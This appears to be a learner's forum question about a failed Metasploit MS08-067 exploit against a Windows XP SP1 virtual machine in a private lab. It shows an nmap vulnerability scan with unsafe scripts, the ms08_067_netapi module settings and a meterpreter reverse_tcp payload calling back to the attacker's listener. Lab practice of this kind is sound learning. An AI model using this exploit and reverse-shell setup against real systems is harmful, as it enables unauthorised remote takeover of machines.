I'm learning how to use Metasploit. I'm using VirtualBox to run a VM with Kali Linux (192.168.56.101) and another with Windows XP SP1 (192.168.56.103). The two VMs can ping each other and Windows Firewall is disabled. I'm running Metasploit on Kali Linux and trying to attack Windows XP SP1.
I fire up msfconsole and start with a port scan:
nmap -sT -A --script=smb-check-vulns -Pn --script-args=unsafe=1 192.168.56.103
which tells me
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
I set the parameters this way:
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.103 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.56.101 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
2 Windows XP SP0/SP1 Universal
Then:
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.101:8080
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
No active sessions.
What am I doing wrong?
Aucun commentaire:
Enregistrer un commentaire